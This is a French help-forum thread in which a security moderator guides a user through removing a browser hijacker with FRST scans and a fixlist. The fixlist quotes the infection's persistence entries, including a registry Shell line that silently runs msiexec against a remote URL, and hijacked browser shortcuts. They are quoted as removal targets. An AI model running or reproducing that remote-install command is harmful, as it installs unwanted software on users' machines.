Supprimer mystart.dealwifi
Fermé
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
-
Modifié le 3 mai 2017 à 11:41
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 mai 2017 à 19:12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 4 mai 2017 à 19:12
A voir également:
- Supprimer mystart.dealwifi
- Supprimer une page word - Guide
- Supprimer compte instagram - Guide
- Supprimer edge - Guide
- Supprimer bing - Guide
- Supprimer compte facebook - Guide
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
3 mai 2017 à 11:41
3 mai 2017 à 11:41
Salut,
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 14:23
3 mai 2017 à 14:23
il faut lancer le scan et j'attends?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
3 mai 2017 à 14:40
3 mai 2017 à 14:40
oui pour avoir les rapports, voir explications du tuto.
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 15:55
3 mai 2017 à 15:55
ok je viens de le faire, j'ai deux rapports qui se sont ouverts mais est ce que tu sais ou ils se sont logés que je te les envoie
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
>
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 17:47
3 mai 2017 à 17:47
Ils se trouvent dans le même dossier que FRST qui doit se trouver sur le bureau, si tu as suivi le tuto.
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 20:26
3 mai 2017 à 20:26
y'a rien sur mon bureau, en fait y'en a un seul et il est dans mes téléchargements, https://pjjoint.malekal.com/files.php?id=FRST_20170503_v15z11v5l8o14
il t'en faut 3?
il t'en faut 3?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
3 mai 2017 à 20:27
3 mai 2017 à 20:27
oui il faut les 3..
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 20:29
3 mai 2017 à 20:29
sinon tout a l'heur quand j'ouvre mon ordi, avant que windows se lance, une page noir se lance, regardes la photo, https://pjjoint.malekal.com/files.php?id=20170503_t9o9t9g10c5
j'ai bien lancer le nettoyage mais y'a toujours le virus
j'ai bien lancer le nettoyage mais y'a toujours le virus
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
>
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 20:32
3 mai 2017 à 20:32
Donne le rapport Addition.txt ....
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 20:45
3 mai 2017 à 20:45
zirko123
Messages postés
59
Date d'inscription
lundi 9 mars 2015
Statut
Membre
Dernière intervention
3 mai 2017
3 mai 2017 à 20:46
3 mai 2017 à 20:46
en revanche il me manque le shortcut, veux tu que je recommence l'opération?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 636
Modifié le 3 mai 2017 à 20:52
Modifié le 3 mai 2017 à 20:52
Vas dans le Panneau de configuration
puis programmes et fonctionnalités.
Spybot - Search & Destroy
SpyHunter 4
Web Companion
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...
puis programmes et fonctionnalités.
Spybot - Search & Destroy
SpyHunter 4
Web Companion
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-91746520-757560440-668047797-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YRkU1RUZQNTRSNkE5NkF1Mjq2FdM4NWM8RjM1NTkxNq%3D%3D /q [Pays US - 104.24.101.133]
CHR Extension: (Bing) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fcfenmboojpjinhpgggodefccipikbpd [2017-04-27]
S4 SNARE; C:\Users\admin\AppData\Local\SNARE\Snare.dll [687616 2017-05-03] () [File not signed]
R2 WinSAPSvc; C:\Users\admin\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [File not signed] <==== ATTENTION
S2 MicrosoftCRLSrv; C:\ProgramData\Microsoft\IdentityCRL\production\ppcrlconfig617.dll [X]
S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 FirefoxU; C:\Program Files\Firefox\bin\FirefoxUpdate.exe [X] <==== ATTENTION
S2 Kitty; C:\Users\admin\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION
2017-05-03 13:27 - 2017-05-03 13:27 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-02 23:21 - 2017-05-02 23:21 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103 (1).exe
2017-05-02 20:33 - 2017-05-02 21:24 - 00000194 _____ C:\Users\admin\Desktop\a faire.txt
2017-04-28 15:27 - 2017-04-28 15:27 - 00000000 ____D C:\Users\admin\AppData\Local\Cuptony
2017-04-28 15:26 - 2017-04-28 15:26 - 00000007 _____ C:\Windows\system32\81B5.tmp
2017-04-28 15:21 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Roaming\WinSAPSvc
2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Windows\psgo
2017-04-28 15:21 - 2017-04-28 15:21 - 00000000 ____D C:\Program Files\Cuptony
2017-04-27 20:40 - 2017-04-27 20:40 - 00000000 ____D C:\Program Files\Everness
2017-04-27 20:32 - 2017-05-02 20:48 - 00002195 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-27 18:25 - 2017-04-27 18:25 - 00000000 ____D C:\Users\admin\AppData\Local\Everness
2017-04-27 18:17 - 2017-05-02 15:48 - 00000000 ____D C:\Program Files\BiaoJi
2017-04-25 23:34 - 2017-04-13 17:30 - 00001310 _____ C:\Users\admin\Desktop\lettre.txt
2017-04-25 13:45 - 2017-04-25 13:45 - 00000000 _____ C:\Windows\system32\22
2017-04-25 12:04 - 2017-04-25 12:04 - 00000000 ____D C:\ProgramData\Apple
2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\33
2017-04-25 12:03 - 2017-04-28 15:23 - 00000000 _____ C:\Windows\system32\11
2017-04-25 12:00 - 2017-04-28 15:20 - 00000000 ____D C:\Program Files\AlphaGo
2017-04-25 12:00 - 2017-04-28 15:19 - 00000000 ____D C:\Program Files\MK
2017-04-23 11:24 - 2017-04-23 11:45 - 00013754 ____H C:\Users\admin\Desktop\~WRL1051.tmp
2017-04-18 09:23 - 2017-04-18 09:23 - 60107896 _____ (Malwarebytes ) C:\Users\admin\Downloads\mb3-setup-consumer-3.0.6.1469-10103.exe
2017-04-18 09:20 - 2017-04-18 09:20 - 04089296 _____ C:\Users\admin\Downloads\adwcleaner_6.045.exe
2017-04-18 01:19 - 2017-04-18 01:19 - 00000000 ____D C:\Users\admin\AppData\Local\ASHelper
2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Users\admin\AppData\Local\Eastness
2017-04-17 21:06 - 2017-04-17 21:06 - 00000000 ____D C:\Program Files\temp
2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Roaming\Firefox
2017-04-17 21:03 - 2017-04-17 21:03 - 00000000 ____D C:\Users\admin\AppData\Local\Firefox
2017-04-17 21:02 - 2017-05-03 13:27 - 00000000 ____D C:\Program Files\Firefox
2017-04-17 21:02 - 2017-04-30 07:52 - 00000000 ____D C:\Users\admin\AppData\Local\Kitty
2017-04-17 21:02 - 2017-04-25 12:02 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 21:01 - 2017-05-02 15:49 - 00000000 ____D C:\Users\admin\AppData\Local\SNARE
2017-04-17 21:01 - 2017-04-28 15:25 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 21:01 - 2017-04-17 21:01 - 00000000 ____D C:\Program Files\MIO
HKU\S-1-5-21-91746520-757560440-668047797-1000\...\ChromeHTML: -> "C:\Program Files\Cuptony\Application\chrome.exe" "%1" <==== ATTENTION
C:\Program Files\Cuptony
Task: {10EDE2BC-9839-490C-B802-235F2F77EAC5} - \PowerWord-SCT-JT -> No File <==== ATTENTION
Task: {E19812B3-DA84-45D5-8082-478031E7F06C} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
ShortcutWithArgument: C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493732942&z=f425eeedffd5a00f39fdbcagez9t3c8mac5o8t4z4e&from=ypid&uid=WDCXWD5000BEVT-22A0RT0_WD-WXA1C20L6048L6048
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Veuillez appuyer sur une touche pour continuer la désinfection...
